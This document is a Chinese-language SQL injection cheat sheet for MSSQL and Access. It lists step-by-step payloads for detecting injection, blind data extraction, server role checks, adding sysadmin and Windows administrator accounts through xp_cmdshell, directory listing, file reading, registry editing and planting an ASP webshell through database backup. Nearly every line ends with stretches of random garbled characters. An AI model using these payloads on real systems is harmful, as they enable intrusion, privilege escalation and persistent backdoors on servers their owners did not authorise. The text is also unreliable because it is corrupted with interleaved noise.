1.判断是否有注入;and 1=1 ;and 1=2 y9{KBM��%h
2.初步判断是否是mssql ;and user>0 h<f_Eo�z-a
t4/�d�1qW0
3.注入参数是字符'and [查询条件] and ''=' �A�7 qyv0F
'�]WS@MbJ�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' u��K�6R+a
MxD,xp�f�
5.判断数据库系统 @Z&�El:]3>
7;jwKA;k�
;and (select count(*) from sysobjects)>0 mssql Kp'_lKW)]q
�l�R�F�04
;and (select count(*) from msysobjects)>0 access <La�$'lG4J
�-�hiG8%l5
SpU�+y|\[0
��Wl/oun~o
6.猜数据库 ;and (select Count(*) from [数据库名])>0 7+0�Kg'^+n
"-8���8bF~
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 I} m\(TS-"
Z,�^`R] 9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �OS�;qb�:;
pwtB{6)VH{
9.(1)猜字段的ascii值(access) !}<d�6&!py
S}�f�3b �N
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 rG�|lRT3-K
{?!��=~vp�
(2)猜字段的ascii值(mssql) _��dky�+ E
I`^
�7Bk.r
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��5R�\{�&�
"j�;"\i0�
10.测试权限结构(mssql) b
R> G%*�a
2�a|9D��\�
As
}:~Jy|�
FNL[6.�!PV
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ?{[��IS�k)
{}kE=L5�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��tPB�r{��
��_y*@Hj�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- R�i=:=oF�(
8�yij=T�*�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- o@*eC �L=�
0tyoH3o/�d
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��.<%2O�N_
^aYlu0�Wm�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �kH/u]+_��
G_vWwH4XtL
;and 1=(select IS_MEMBER('db_owner'));-- Y��"6��
'�
�3�eT5~Lbs
`�2�-6��Qv
h\|� ~Q.kG
11.添加mssql和系统的帐户 �^YG'p?r.s
(k/[/`3�ST
;exec master.dbo.sp_addlogin username;-- U ��l8G� R
;exec master.dbo.sp_password null,username,password;-- "Zm**h.�t�
&� mwQj<Z�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- d5�H�p&tm
+a1��O��r�
;exec master.dbo.xp_cmdshell 'net user username password �H3�\4�&�q
.'�foS>W=t
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- eB�%hP9=:x
XrP�'FLY o
;exec master.dbo.xp_cmdshell 'net user username password /add';-- B_R
J;.oH�
_�3@�[S
F
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- KYa}k0tVAp
Q+@�/�.qJ
[A~n=m�5H�
z�nt�vKOIh
12.(1)遍历目录 m}Xb�#NAF8
Q^13KWvu�V
;create table dirs(paths varchar(100), id int) *Z}^T:3iw}
%87D(h!.I4
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��RN:VsopL
"��/H�� B#
;and (select top 1 paths from dirs)>0 )gF>n��N�E
�h�,��-2+}
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 8x�f]z�M"Q
��YX*NjX�L
�2L�!s'^m-
Ao?y�2 [sE
(2)遍历目录 �QFe�kj�@�
XB����x�&&
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��-c��%#Hd
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ,����~8&0p
�03N|@T�u�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 qZ�QB�"Q.*
, �e�^&,5b
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ~�dc��
o�
�9;2�{��=,
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �hA=.${uIO
�z�XX�=WH
�kX�W5�bR�
�CE,0@%6F*
13.mssql中的存储过程 78M%[7Cq<i
.X1xp��i�%
xp_regenumvalues 注册表根键, 子键 7sypU�1V6�
��]bcAbCZ@
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 7Eb |���AR
!�O�)je>�A
xp_regread 根键,子键,键值名 B�`{7-Asc1
�?,XrZ�RF�
;exec xp_regread �(��:�Y0�^
\�B/!�}Tn;
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 z�X]4D�Ll,
��9}�-;OJe
xp_regwrite 根键,子键, 值名, 值类型, 值 (�JM�k0H3u
r0^�*|+
��
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 $Gs9"~z?;
@�ks�t�G3@
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 r+%$0eB�1^
ee�w�lK]�
xp_regdeletevalue 根键,子键,值名 'kuLk��M,�
o?�,c#g��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �F�Tg��qE@
uKA-<nM._c
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 bU�$��f4J
:<p3L!?8�y
c`Q#4e]%_�
S�7B�\m��v
14.mssql的backup创建webshell ,g�O(zI-1�
�;�$.^����
use model g:oB j6$
q
��S1I#��qb
create table cmd(str image); #1)#W6 h\
�9P1!<6mN\
insert into cmd(str) values (''); $V�8�70
<�
`g�+Kv&546
backup database model to disk='c:\l.asp'; vu@@!cT�6e
<dWms`Qc�O
r91b]m�3xL
W0�+�m A��
15.mssql内置函数 ^�� *1hz<�
�'O^<i`8U]
;and (select @@version)>0 获得Windows的版本号 *";O_ �:C!
k�0bDE�z.X
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �1v~1?+a\2
���d�y.�U;
;and (select user_name())>0 爆当前系统的连接用户 .Lm�0$o*�`
){��<���qp
;and (select db_name())>0 得到当前连接的数据库 � 9dCf@5�]
�'H�8�b+�
>�F5E^��DY
�^k�2g�60]
16.简洁的webshell �) :V��F^"
Y�5�2�TC@'
use model �5~FXy{ZIH
/B!I�k:c�}
create table cmd(str image); ���?��s�5/
.�+A2\�F.^
insert into cmd(str) values (''); d3;Sy��`.
�-|2k�$��W
backup database model to disk='g:\wwwtest\l.asp';
